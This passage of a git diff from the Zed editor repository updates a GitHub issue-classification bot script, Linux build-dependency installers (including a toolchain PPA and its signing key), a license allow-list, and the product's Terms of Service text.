{}).get("number"): - return original + + repo = data["repository"] + for candidate in candidates: + issue_data = repo.get(f"issue_{candidate}") + if not issue_data: + continue + for node in issue_data["timelineItems"]["nodes"]: + dup_number = (node.get("duplicate") or {}).get("number") + if dup_number == duplicate_number: + return candidate return None @@ -265,7 +287,7 @@ def set_field_value(item_id, field_name, value): ) -def add_or_update_project_item(issue_node_id, outcome, closed_as=None, status="Auto-classified", notes=None): +def add_or_update_project_item(issue_node_id, outcome, closed_as=None, status="Auto-classified", notes=None, bot_comment_time=None): """Add an issue to the project board (or update it if already there), setting field values.""" item_id = find_project_item(issue_node_id) if item_id: @@ -283,7 +305,8 @@ def add_or_update_project_item(issue_node_id, outcome, closed_as=None, status="A if notes: set_field_value(item_id, "Notes", notes) - set_field_value(item_id, "Bot version", BOT_VERSION) + if bot_comment_time: + set_field_value(item_id, "Bot version", bot_version_for_time(bot_comment_time)) return item_id @@ -302,14 +325,14 @@ def classify_closed(issue_number, closer_login, state_reason): print(f" Skipping: author '{author}' is a staff member") return - bot_comment = get_bot_duplicate_comment(issue_number) + bot_comment = get_bot_comment_with_time(issue_number) bot_commented = bot_comment is not None print(f" Bot commented: {bot_commented}") closer_is_author = closer_login == author if bot_commented and closer_is_author: - classify_as_success(issue, state_reason) + classify_as_success(issue, bot_comment, state_reason) elif bot_commented and not closer_is_author: # Only authors, staff, and triagers can close issues, so # a non-author closer is always someone with elevated permissions. @@ -320,7 +343,7 @@ def classify_closed(issue_number, closer_login, state_reason): print(" Skipping: no bot comment and not closed as duplicate") -def classify_as_success(issue, state_reason): +def classify_as_success(issue, bot_comment, state_reason): """Author closed their own issue after the bot commented.""" if state_reason == "duplicate": status = "Auto-classified" @@ -340,6 +363,7 @@ def classify_as_success(issue, state_reason): closed_as=state_reason, status=status, notes=notes, + bot_comment_time=bot_comment["created_at"], ) @@ -356,46 +380,48 @@ def classify_non_author_closed(issue, bot_comment, state_reason): closed_as=state_reason, status="Needs review", notes=notes, + bot_comment_time=bot_comment["created_at"], ) def classify_as_assist(issue, bot_comment): """Staff member closed as duplicate after the bot commented. Check if the dup matches.""" - suggested = parse_suggested_issues(bot_comment) + suggested = parse_suggested_issues(bot_comment["body"]) + if not suggested: + print(" -> Assist, needs review (could not parse bot suggestions)") + add_or_update_project_item( + issue["node_id"], outcome="Assist", closed_as="duplicate", + status="Needs review", notes="Could not parse bot suggestions", + bot_comment_time=bot_comment["created_at"]) + return + original = None try: - original = get_closed_as_duplicate_of(issue["number"]) + original = find_canonical_among(issue["number"], suggested) except (requests.RequestException, RuntimeError) as error: - print(f" Warning: failed to get the original-for the duplicate issue: {error}") - - if original and suggested: - if original in suggested: - status = "Auto-classified" - notes = None - print(f" -> Assist (original #{original} matches bot suggestion)") - else: - status = "Needs review" - suggested_str = ", ".join(f"#{number}" for number in suggested) - notes = f"Bot suggested {suggested_str}; closed as dup of #{original}" - print(f" -> Possible Assist, needs review ({notes})") + print(f" Warning: failed to query candidate timelines: {error}") + + if original: + status = "Auto-classified" + notes = None + print(f" -> Assist (original #{original} matches bot suggestion)") else: - # couldn't determine original or no suggestions parsed status = "Needs review" - if not original: - notes = "Could not determine original issue from timeline" - else: - notes = f"Closed as dup of #{original}; could not parse bot suggestions" + suggested_str = ", ".join(f"#{number}" for number in suggested) + notes = f"Bot suggested {suggested_str}; none matched as canonical" print(f" -> Possible Assist, needs review ({notes})") add_or_update_project_item( - issue["node_id"], outcome="Assist", closed_as="duplicate", status=status, notes=notes) + issue["node_id"], outcome="Assist", closed_as="duplicate", status=status, notes=notes, + bot_comment_time=bot_comment["created_at"]) def classify_as_missed_opportunity(issue): """Issue closed as duplicate but the bot never commented.""" print(" -> Missed opportunity") add_or_update_project_item( - issue["node_id"], outcome="Missed opportunity", closed_as="duplicate", status="Auto-classified") + issue["node_id"], outcome="Missed opportunity", closed_as="duplicate", status="Auto-classified", + bot_comment_time=issue["created_at"]) def classify_open(): @@ -425,16 +451,18 @@ def classify_open(): f"type is {type_name}" if type_name not in ("Bug", "Crash") else f"author {author} is staff" if is_staff_member(author) else "already on the board" if find_project_item(node_id) - else "no bot duplicate comment found" if not get_bot_duplicate_comment(number) + else "no bot duplicate comment found" if not (bot_comment := get_bot_comment_with_time(number)) else None ) + if skip_reason: print(f" #{number}: skipping, {skip_reason}") skipped += 1 continue print(f" #{number}: adding as Noise") - add_or_update_project_item(node_id, outcome="Noise", status="Auto-classified") + add_or_update_project_item(node_id, outcome="Noise", status="Auto-classified", + bot_comment_time=bot_comment["created_at"]) added += 1 except Exception as error: # broad catch: one issue failing shouldn't stop the sweep print(f" #{number}: error processing issue, skipping: {error}") diff --git a/script/language-extension-version b/script/language-extension-version deleted file mode 100755 index 119021e566d44a55428fe78ecf123e491d0a1616..0000000000000000000000000000000000000000 --- a/script/language-extension-version +++ /dev/null @@ -1,29 +0,0 @@ -#!/usr/bin/env bash - -set -euox pipefail - -if [ "$#" -lt 1 ]; then - echo "Usage: $0 [version]" - exit 1 -fi - -LANGUAGE=$1 -VERSION=${2:-} - -EXTENSION_DIR="extensions/$LANGUAGE" -EXTENSION_TOML="$EXTENSION_DIR/extension.toml" -CARGO_TOML="$EXTENSION_DIR/Cargo.toml" - -if [ ! -d "$EXTENSION_DIR" ]; then - echo "Directory $EXTENSION_DIR does not exist." - exit 1 -fi - -if [ -z "$VERSION" ]; then - grep -m 1 'version =' "$EXTENSION_TOML" | awk -F\" '{print $2}' - exit 0 -fi - -sed -i '' -e "s/^version = \".*\"/version = \"$VERSION\"/" "$EXTENSION_TOML" -sed -i '' -e "s/^version = \".*\"/version = \"$VERSION\"/" "$CARGO_TOML" -cargo update --workspace diff --git a/script/licenses/zed-licenses.toml b/script/licenses/zed-licenses.toml index 572dd5c14aebcdea3544ac15b751be4c212ecf52..db14a280f2f1537c37f96f6fa180b96d54afa209 100644 --- a/script/licenses/zed-licenses.toml +++ b/script/licenses/zed-licenses.toml @@ -26,6 +26,7 @@ accepted = [ "OpenSSL", "Zlib", "BSL-1.0", + "bzip2-1.0.6", ] [procinfo.clarify] diff --git a/script/linux b/script/linux index c5c4ea9ab3856545bcff63bc6bdaed5f06b8e07c..1eda7909b9580e95882f9de5ec9881f83acbcb13 100755 --- a/script/linux +++ b/script/linux @@ -27,16 +27,20 @@ if [[ -n $apt ]]; then g++ libasound2-dev libfontconfig-dev + libgit2-dev + libglib2.0-dev + libssl-dev + libva-dev + libvulkan1 libwayland-dev libx11-xcb-dev libxkbcommon-x11-dev - libssl-dev libzstd-dev - libvulkan1 - libgit2-dev make cmake clang + lld + llvm jq git curl @@ -46,6 +50,8 @@ if [[ -n $apt ]]; then musl-tools musl-dev build-essential + pipewire + xdg-desktop-portal ) if (grep -qP 'PRETTY_NAME="(Debian|Raspbian).+13' /etc/os-release); then # libstdc++-14-dev is in build-essential @@ -55,11 +61,30 @@ if [[ -n $apt ]]; then elif (grep -qP 'PRETTY_NAME="((Debian|Raspbian).+12|Linux Mint 21|.+22\.04)' /etc/os-release); then deps+=( mold libstdc++-12-dev ) elif (grep -qP 'PRETTY_NAME="((Debian|Raspbian).+11|Linux Mint 20|.+20\.04)' /etc/os-release); then - deps+=( libstdc++-10-dev ) + # Ubuntu 20.04 ships clang-10 and libstdc++-10 which lack adequate C++20 + # support for building webrtc-sys (requires -std=c++20, lambdas in + # unevaluated contexts from clang 17+, and working std::ranges in the + # stdlib). + # Note: the prebuilt libwebrtc.a is compiled with libstdc++, so we must + # use libstdc++ (not libc++) to avoid ABI mismatches at link time. + + # libstdc++-11-dev (headers with working pointer_traits/contiguous_range) + # is only available from the ubuntu-toolchain-r PPA. Add the source list + # and GPG key manually instead of using add-apt-repository, whose HKP + # keyserver lookups (port 11371) frequently time out in CI. + $maysudo "$apt" install -y curl gnupg + codename=$(lsb_release -cs) + echo "deb https://ppa.launchpadcontent.net/ubuntu-toolchain-r/test/ubuntu $codename main" | \ + $maysudo tee /etc/apt/sources.list.d/ubuntu-toolchain-r-test.list > /dev/null + curl -fsSL 'https://keyserver.ubuntu.com/pks/lookup?op=get&search=0x1E9377A2BA9EF27F' | \ + sed -n '/-----BEGIN PGP PUBLIC KEY BLOCK-----/,/-----END PGP PUBLIC KEY BLOCK-----/p' | \ + $maysudo gpg --dearmor -o /etc/apt/trusted.gpg.d/ubuntu-toolchain-r-test.gpg + deps+=( clang-18 libstdc++-11-dev ) fi $maysudo "$apt" update $maysudo "$apt" install -y "${deps[@]}" + finalize exit 0 fi @@ -78,6 +103,8 @@ if [[ -n $dnf ]] || [[ -n $yum ]]; then cmake alsa-lib-devel fontconfig-devel + glib2-devel + libva-devel wayland-devel libxcb-devel libxkbcommon-x11-devel @@ -85,6 +112,8 @@ if [[ -n $dnf ]] || [[ -n $yum ]]; then libzstd-devel vulkan-loader sqlite-devel + pipewire + xdg-desktop-portal jq git tar @@ -141,7 +170,9 @@ if [[ -n $zyp ]]; then cmake fontconfig-devel gcc + libva-devel gcc-c++ + glib2-devel git gzip jq @@ -158,6 +189,8 @@ if [[ -n $zyp ]]; then tar wayland-devel xcb-util-devel + pipewire + xdg-desktop-portal ) $maysudo "$zyp" install -y "${deps[@]}" finalize @@ -175,6 +208,8 @@ if [[ -n $pacman ]]; then cmake alsa-lib fontconfig + glib2 + libva wayland libgit2 libxcb @@ -184,6 +219,8 @@ if [[ -n $pacman ]]; then pkgconf mold sqlite + pipewire + xdg-desktop-portal jq git ) @@ -205,6 +242,8 @@ if [[ -n $xbps ]]; then gcc alsa-lib-devel fontconfig-devel + glib-devel + libva-devel libxcb-devel libxkbcommon-devel libzstd-devel @@ -213,6 +252,8 @@ if [[ -n $xbps ]]; then vulkan-loader mold sqlite-devel + pipewire + xdg-desktop-portal ) $maysudo "$xbps" -Syu "${deps[@]}" finalize @@ -226,16 +267,20 @@ if [[ -n $emerge ]]; then deps=( app-arch/zstd app-misc/jq + dev-libs/glib dev-libs/openssl dev-libs/wayland dev-util/cmake media-libs/alsa-lib media-libs/fontconfig + media-libs/libva media-libs/vulkan-loader x11-libs/libxcb x11-libs/libxkbcommon sys-devel/mold dev-db/sqlite + media-video/pipewire + sys-apps/xdg-desktop-portal ) $maysudo "$emerge" -u "${deps[@]}" finalize diff --git a/script/terms/terms.rtf b/script/terms/terms.rtf index f5fab23f4551fd0b3f8605209c3315eb470af224..cd01004c11ed10e58d3c17b1274cd499a1046c66 100644 --- a/script/terms/terms.rtf +++ b/script/terms/terms.rtf @@ -2,128 +2,194 @@ {\colortbl;\red255\green0\blue0;\red0\green0\blue255;} \widowctrl\hyphauto -{\pard \qc \f0 \sa180 \li0 \fi0 \b \fs36 Zed End User Terms\par} +{\pard \qc \f0 \sa180 \li0 \fi0 \b \fs36 Terms of Service\par} {\pard \ql \f0 \sa180 \li0 \fi0 \par} -{\pard \ql \f0 \sa180 \li0 \fi0 PLEASE READ THESE TERMS AND CONDITIONS CAREFULLY BEFORE USING THE SERVICE OR SOFTWARE OFFERED BY ZED INDUSTRIES, INC. ("ZED", OR "WE"). BY ACCESSING OR USING THE SOLUTION (AS DEFINED BELOW) IN ANY MANNER, YOU ("YOU" OR "CUSTOMER") AGREE TO BE BOUND BY THESE TERMS (THE "AGREEMENT") TO THE EXCLUSION OF ALL OTHER TERMS. YOU REPRESENT AND WARRANT THAT YOU HAVE THE AUTHORITY TO ENTER INTO THIS AGREEMENT; IF YOU ARE ENTERING INTO THIS AGREEMENT ON BEHALF OF AN ORGANIZATION OR ENTITY, REFERENCES TO "CUSTOMER" AND "YOU" IN THIS AGREEMENT, REFER TO THAT ORGANIZATION OR ENTITY. IF YOU DO NOT AGREE TO ALL OF THE FOLLOWING, YOU MAY NOT USE OR ACCESS THE SOLUTION IN ANY MANNER. IF THE TERMS OF THIS AGREEMENT ARE CONSIDERED AN OFFER, ACCEPTANCE IS EXPRESSLY LIMITED TO SUCH TERMS.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel1 \b \fs32 1. ACCESS TO AND USE OF THE SOLUTION\par} -{\pard \ql \f0 \sa180 \li0 \fi0 Subject to the terms and conditions of this Agreement, Zed hereby grants to You, and You hereby accept from Zed, a term-limited, non-exclusive, non-transferable, non-assignable and non-sublicensable license to make use of the Editor for Your internal use only, and subject to the use limitations in Section 2.2.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel1 \b \fs32 2. TERMS APPLICABLE TO THE EDITOR\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 2.1. License Grant\par} -{\pard \ql \f0 \sa180 \li0 \fi0 Subject to the terms and conditions of this Agreement, Zed hereby grants to You, and You hereby accept from Zed, a term-limited, non-exclusive, non-transferable, non-assignable and non-sublicensable license to make use of the Editor for Your internal use only, and subject to the use limitations in Section 2.2.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 2.2. License Limitations\par} -{\pard \ql \f0 \sa180 \li0 \fi0 You agree that You shall not: (a) exceed the scope of the licenses granted in Section 2.1; (b) make copies of the Editor; (c) distribute, sublicense, assign, delegate, rent, lease, sell, time-share or otherwise transfer the benefits of, use under, or rights to, the license granted in Section 2.1; (d) reverse engineer, decompile, disassemble or otherwise attempt to learn the source code, structure or algorithms underlying the Editor, except to the extent required to be permitted under applicable law; (e) modify, translate or create derivative works of the Editor; or (f) remove any copyright, trademark, patent or other proprietary notice that appears on the Editor or copies thereof.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 2.3. Open Source Software\par} -{\pard \ql \f0 \sa180 \li0 \fi0 Zed makes certain versions of the Editor and related software available at the Zed GitHub Repository: {\field{\*\fldinst{HYPERLINK "https://github.com/zed-industries/zed"}}{\fldrslt{\ul -https://github.com/zed-industries/zed -}}} - (the "Repo"). Your use of such software is subject to the open source software licenses declared in the Repo.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel1 \b \fs32 3. TERMS APPLICABLE TO THE ZED SERVICE\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 3.1. Access to and Scope of Zed Service\par} -{\pard \ql \f0 \sa180 \li0 \fi0 If you have elected to use the Zed Service by enabling or activating the Zed Service, Zed will use commercially reasonable efforts to make the Zed Service available to You as set forth in this Agreement. Once you elected to use the Zed Service, You may access and use the Zed Service during the Term, subject to Your compliance with the terms and conditions of the Agreement.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 3.2. Restrictions\par} -{\pard \ql \f0 \sa180 \li0 \fi0 You will use the Zed Service only in accordance with all applicable laws, including, but not limited to, laws related to data (whether applicable within the United States, the European Union, or otherwise). You agree not to (and will not allow any third party to): (i) remove or otherwise alter any proprietary notices or labels from the Zed Service or any portion thereof; (ii) reverse engineer, decompile, disassemble, or otherwise attempt to discover the underlying structure, ideas, or algorithms of the Zed Service or any software used to provide or make the Zed Service available; or (iii) rent, resell or otherwise allow any third party access to or use of the Zed Service. Zed may suspend Your access to or use of the Zed Service as follows: (a) immediately if Zed reasonably believes Your use of the Zed Service may pose a security risk to or may adversely impact the Zed Service; or (b) if You are in breach of this Agreement.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 3.3. Customer Data\par} -{\pard \ql \f0 \sa180 \li0 \fi0 You are solely responsible for Customer Data including, but not limited to: (a) compliance with all applicable laws and this Agreement; (b) any claims relating to Customer Data; and (c) any claims that Customer Data infringes, misappropriates, or otherwise violates the rights of any third party. You agree and acknowledge that Customer Data may be irretrievably deleted if Your account is terminated. For purposes of this Agreement, "Customer Data" shall mean any data, information or other material provided, uploaded, or submitted by You to the Zed Service in the course of using the Zed Service. Notwithstanding anything to the contrary, You represent and warrant that You will not transfer or make available to Zed any personally identifiable information or related information subject to applicable data privacy laws or regulations, unless otherwise agreed to in writing by Zed.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel3 \b \fs24 3.3.1. Customer Data Made Available to Zed\par} -{\pard \ql \f0 \sa180 \li0 \fi0 To the extent You elect to make Customer Data available to Zed, the same may only be used by Zed according to the Customer Data type and the use rights regarding the same as described herein:\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel3 \b \fs24 3.3.2. Usage Data\par} -{\pard \ql \f0 \sa180 \li0 \fi0 To improve the Editor and understand how You use it, Zed optionally collects the following usage data:\par} -{\pard \ql \f0 \sa0 \li720 \fi-360 \bullet \tx360\tab (a)\tx360\tab file extensions of opened files;\sa180\par} -{\pard \ql \f0 \sa0 \li720 \fi-360 \bullet \tx360\tab (b)\tx360\tab features and tools You use within the Editor;\sa180\par} -{\pard \ql \f0 \sa0 \li720 \fi-360 \bullet \tx360\tab (c)\tx360\tab project statistics (e.g., number of files); and\sa180\par} -{\pard \ql \f0 \sa0 \li720 \fi-360 \bullet \tx360\tab (d)\tx360\tab frameworks detected in Your projects\sa180\sa180\par} -{\pard \ql \f0 \sa180 \li0 \fi0 (a-d collectively, "Usage Data"). Usage Data does not include any of Your software code or sensitive project details. You may change Your preferences disabling the collection of Usage Data and You can audit Usage Data collected by the Editor at any time. See {\field{\*\fldinst{HYPERLINK "https://zed.dev/docs/telemetry"}}{\fldrslt{\ul -https://zed.dev/docs/telemetry -}}} - for more.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 Usage Data is associated with a secure random telemetry ID which may be linked to Your email address. This linkage currently serves two purposes: (1) it allows Zed to analyze usage patterns over time while maintaining Your privacy; and (2) it enables Zed to reach out to specific user groups for feedback and improvement suggestions. Zed may contact You based on Your usage patterns to better understand your needs and improve the Solution. If You delete Your account, the link between Your telemetry ID and Your email address will be permanently removed. By continuing to use Editor or Solution with this feature enabled You agree to this Usage Data collection.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel3 \b \fs24 3.3.3. Crash Reports\par} -{\pard \ql \f0 \sa180 \li0 \fi0 Customer Data consisting of data related to the behavior of the Solution prior to a crash or failure, such as stack traces are collected and classified as "Crash Reports". Zed will use commercially reasonable efforts to exclude any personally identifiable information from Crash Reports, but due to the nature of a crash, Zed does not ensure that information such as paths will be excluded from Crash Reports. Crash Reports will be used solely for Zed's internal purposes in connection with diagnosing defects in the Solution that led to the crash. You may grant us permission to capture Crash Reports when installing or activating the Solution, and You may change Your preferences at any time in the settings feature of the Solution. Once You grant us this permission, Zed will retain the Crash Reports indefinitely.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel3 \b \fs24 3.3.4. User Content\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \u8226 ? You may access, modify or create certain data or information in connection with your access or use of the Zed Editor or the Solution. Such data and information may include, but is not limited to any of the following:\par} -{\pard \ql \f0 \sa0 \li720 \fi-360 \bullet \tx360\tab (a)\tx360\tab file contents and associated metadata (e.g., filename, paths, size, timestamps);\sa180\par} -{\pard \ql \f0 \sa0 \li720 \fi-360 \bullet \tx360\tab (b)\tx360\tab source control history, comments and metadata (e.g., git history, commit messages);\sa180\par} -{\pard \ql \f0 \sa0 \li720 \fi-360 \bullet \tx360\tab (c)\tx360\tab configuration data (e.g., settings, keymaps);\sa180\par} -{\pard \ql \f0 \sa0 \li720 \fi-360 \bullet \tx360\tab (d)\tx360\tab anything typed, pasted and/or displayed on screen while using the Editor;\sa180\par} -{\pard \ql \f0 \sa0 \li720 \fi-360 \bullet \tx360\tab (e)\tx360\tab derivative works of the above generated by the Editor (e.g., format conversions, summaries, indexes, caches);\sa180\par} -{\pard \ql \f0 \sa0 \li720 \fi-360 \bullet \tx360\tab (f)\tx360\tab metadata, code and other derivative works of the above returned by language servers and other local tooling; and\sa180\par} -{\pard \ql \f0 \sa0 \li720 \fi-360 \bullet \tx360\tab (g)\tx360\tab metadata, code and other derivative works of the above returned by services integrated with the Zed Editor\sa180\sa180\par} -{\pard \ql \f0 \sa180 \li0 \fi0 (a-g collectively, "User Content").\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel3 \b \fs24 3.3.5. Handling of User Content\par} -{\pard \ql \f0 \sa180 \li0 \fi0 Zed will make use of or transfer User Content only as specified in this Agreement, or as necessary to comply with applicable law.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel3 \b \fs24 3.3.5.1. Zed Collaboration Services\par} -{\pard \ql \f0 \sa180 \li0 \fi0 When using Zed Collaboration Services, User Content is transmitted from Your environment only if You collaborate with other Zed users by electing to share a project in the Editor. Once You share a project, Zed may transmit User Content consisting of file paths, file contents, and metadata regarding the code returned by language servers. Currently, Zed does not persist any User Content beyond the Your collaboration session. If You unshare a project or disconnect from the Solution, all information associated with such project will be deleted from Zed servers. In the future, Zed may save User Content regarding projects beyond the scope of a single collaboration session. We may share such User Content with those users You elected to grant access to. Zed's access to such User Content is limited to debugging and making improvements to the Solution.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel3 \b \fs24 3.3.5.2. Other Services\par} -{\pard \ql \f0 \sa180 \li0 \fi0 The Zed Editor supports integration with API-based services maintained and not operated by Zed (the "Other Services"). By way of example, Other Services includes those made available by GitHub, Anthropic, OpenAI, and similar providers, or those You host or manage directly. You may configure the Zed Editor to interoperate, communicate with, and exchange data (including User Content) directly with the Other Services. Zed is not responsible or otherwise liable with respect to Your use of any Other Service, including but not limited to the exchange of data between the Other Service and the Zed Editor. The terms and conditions, including the applicable privacy policy, with respect to the Other Service are those made available by the applicable Other Service, not these Terms.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel3 \b \fs24 3.3.5.3. Zed AI Services\par} -{\pard \ql \f0 \sa180 \li0 \fi0 The Zed Editor supports integration with API-based services maintained and operated by Zed (the "Zed AI Services"). You may elect to use Zed AI Services as the provider for various Zed Editor features (e.g., Agent Panel, Inline Assistant, Edit Predictions, and similar features). In connection with Your use of these features, the Zed Editor and Zed AI Services may make use of User Content to generate contextually relevant responses (the \u8220"Output\u8221"). Other than as specified in Section 3.3.5.4 of these Terms, Zed will not use User Content for training of its models, or disclose User Content.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 Output is provided "as is" without any warranties or guarantees of functionality, security, or fitness for a particular purpose. While efforts are made to ensure the accuracy and reliability, Output may include errors, vulnerabilities, and defects. You are responsible for reviewing, testing, and validating Output before use in any production or critical environment. Zed assumes no liability for any damages, losses, or liability arising from the use, modification, reliance on, or deployment of Output. Any such use is at Your own risk.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel3 \b \fs24 3.3.5.4. Improvement Feedback\par} -{\pard \ql \f0 \sa180 \li0 \fi0 When using Zed AI Services to provide Edit Predictions in connection with certain open source software projects, You may elect to share requests, responses and feedback comments (collectively "Model Improvement Feedback") with Zed, and Zed may use the same to improve Zed Edit Predictions models. You may opt-out of sharing Model Improvement Feedback at any time.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 For more information on Zed Edit Predictions please see: {\field{\*\fldinst{HYPERLINK "https://zed.dev/docs/ai/ai-improvement"}}{\fldrslt{\ul -https://zed.dev/docs/ai/ai-improvement -}}} -\par} -{\pard \ql \f0 \sa180 \li0 \fi0 When using Zed AI Services in connection with the Agent Panel, You may elect to share with Zed requests, responses and feedback regarding the Agent Panel and related Output (the \u8220"Agent Improvement Feedback\u8221") with Zed, and Zed may use the same to improve the Agent Panel and related Output. Zed will only collect Agent Improvement Feedback when You elect to share the same.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 For more information regarding the Agent Panel please see: {\field{\*\fldinst{HYPERLINK "https://zed.dev/docs/ai/ai-improvement"}}{\fldrslt{\ul -https://zed.dev/docs/ai/ai-improvement -}}} -\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel3 \b \fs24 3.4. Privacy Policy\par} -{\pard \ql \f0 \sa180 \li0 \fi0 You and Zed are bound by the terms and conditions contained in the Zed Privacy Policy which is incorporated by reference hereto. The Zed Privacy Policy is available at the following URL: {\field{\*\fldinst{HYPERLINK "https://zed.dev/privacy-policy"}}{\fldrslt{\ul -https://zed.dev/privacy-policy +{\pard \ql \f0 \sa180 \li0 \fi0 {\b Last Updated}: March 2, 2026\par} +{\pard \ql \f0 \sa180 \li0 \fi0 Welcome, and thank you for your interest in Zed Industries, Inc. (\u8220"{\b Zed},\u8221" \u8220"{\b we},\u8221" or \u8220"{\b us}\u8221") and our website at {\field{\*\fldinst{HYPERLINK "https://www.zed.dev"}}{\fldrslt{\ul +www.zed.dev +}}} +, along with our downloadable Zed software (the \u8220"{\b Software}\u8221") and related subscription service (the \u8220"{\b Service}\u8221"). These Terms of Service are a legally binding contract between you and Zed regarding your use of the Service.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 Please read the following Terms carefully.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 {\b By accessing or using the Service, you (\u8220"You\u8221" or \u8220"Customer\u8221")\u160 ?agree to these Terms of Service, the Data Processing Addendum (\u8220"DPA\u8221"), available upon request,\u160 ?and Zed\u8217's {\field{\*\fldinst{HYPERLINK "/privacy-policy"}}{\fldrslt{\ul +Privacy Policy +}}} + (collectively, the \u8220"Terms\u8221").}\par} +{\pard \ql \f0 \sa180 \li0 \fi0 If you are not eligible, or do not agree to the Terms, you may not access or use the Service.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 By using the Service, you confirm that you have read and understand these Terms and that they form a binding agreement between you and Zed.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 {\b ARBITRATION\u160 ?NOTICE}. Except for certain kinds of disputes described in Section\u160 ?15.2 (Dispute Resolution and Arbitration), you agree that disputes arising under these Terms will be resolved by binding, individual arbitration, and BY ACCEPTING THESE TERMS, YOU AND ZED ARE EACH WAIVING THE RIGHT TO A TRIAL BY JURY OR TO PARTICIPATE IN ANY CLASS ACTION OR REPRESENTATIVE PROCEEDING.\u160 ?ALTERNATIVELY, CUSTOMER MAY OPT OUT OF ARBITRATION PER SECTION 17.2(a).\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel1 \b \fs32 1. Overview\par} +{\pard \ql \f0 \sa180 \li0 \fi0 Subject to these Terms, Zed will permit Customer to access and use Zed\u8217's AI-enabled software-as-a-service offering (the \u8220"{\b Service}\u8221"), which enables certain additional features and functionality (including artificial intelligence and collaboration features) in Zed\u8217's open source code editing software (\u8220"{\b Software}\u8221").\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel1 \b \fs32 2. Service\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 2.1. Eligibility\par} +{\pard \ql \f0 \sa180 \li0 \fi0 Customer\u160 ?must be at least 18 years old\u160 ?to use the Service. By agreeing to these Terms, Customer represents and warrants to Zed that: (a) Customer is at least 18 years old; (b) Customer has not previously been suspended or removed from the Service; and (c) Customer\u8217's registration and use of the Service is in compliance with any and all applicable laws and regulations. If Customer is an entity, organization, or company, the individual accepting these Terms on Customer\u8217's behalf represents and warrants that they have authority to bind Customer to these Terms and Customer agrees to be bound by these Terms.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 2.2. Access Grant\par} +{\pard \ql \f0 \sa180 \li0 \fi0 During the Term, subject to Customer\u8217's compliance with the terms of the Terms, Customer may access and use the Service only for Customer\u8217's internal business purposes\u160 ?or for individuals, for personal non-commercial purposes, in accordance with the then-current version of Zed\u8217's usage guidelines and standard technical documentation for the Service that Zed makes generally available to its customers (\u8220"{\b Documentation}\u8221"), the Terms, and any terms set forth in the applicable Subscription Service (as defined in Section 3.4 below). Customer\u160 ?agrees\u160 ?to access the Service only through the mechanisms designated by Zed. Without limiting the foregoing, to access the Service, Customer may be required to associate an existing third-party account with the Service to enable authentication (e.g., via OAuth). Customer will be responsible for the acts and omissions of all persons who access the Service through Customer\u8217's account as though such acts and omissions were Customer\u8217's own. Customer\u160 ?will promptly notify Zed if it becomes aware of any compromise to its Zed account.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 2.3. Acceptable Use\par} +{\pard \ql \f0 \sa180 \li0 \fi0 The Service uses technology provided by multiple third party AI subprocessors (the \u8220"AI Providers\u8221") including but not limited to: Anthropic, PBC (\u8220"Anthropic\u8221"), Google LLC (\u8220"Google\u8221"), LiveKit Incorporated, OpenAI, LLC (\u8220"OpenAI\u8221") etc., as may be updated from time to time. Customer may not use the Service in a manner that violates any applicable AI Provider policy which are listed on {\field{\*\fldinst{HYPERLINK "https://zed.dev/acceptable-use-policies"}}{\fldrslt{\ul +https://zed.dev/acceptable-use-policies +}}} +, including Anthropic\u8217's {\field{\*\fldinst{HYPERLINK "https://www.anthropic.com/legal/aup"}}{\fldrslt{\ul +Usage Policy +}}} +, Google Gemini\u8217's {\field{\*\fldinst{HYPERLINK "https://policies.google.com/terms/generative-ai/use-policy"}}{\fldrslt{\ul +Generative AI Prohibited Use Policy +}}} +, GitHub's {\field{\*\fldinst{HYPERLINK "https://docs.github.com/en/site-policy/acceptable-use-policies/github-acceptable-use-policies"}}{\fldrslt{\ul +Acceptable Use Policy +}}} +, LiveKit\u8217's {\field{\*\fldinst{HYPERLINK "https://livekit.io/legal/acceptable-use-policy"}}{\fldrslt{\ul +Acceptable Use Policy +}}} +; OpenAI\u8217's {\field{\*\fldinst{HYPERLINK "https://openai.com/policies/usage-policies/"}}{\fldrslt{\ul +Usage Policies +}}} +\u160 ?or {\field{\*\fldinst{HYPERLINK "https://openai.com/api/policies/sharing-publication/"}}{\fldrslt{\ul +Sharing and Publication Policy +}}} +; and {\field{\*\fldinst{HYPERLINK "https://openai.com/api/policies/community-guidelines/"}}{\fldrslt{\ul +Community Guidelines +}}} +; each of which may be updated from time to time and are expressly incorporated by reference. Customer\u160 ?is solely responsible to check for updates to the applicable AI Provider policy from time 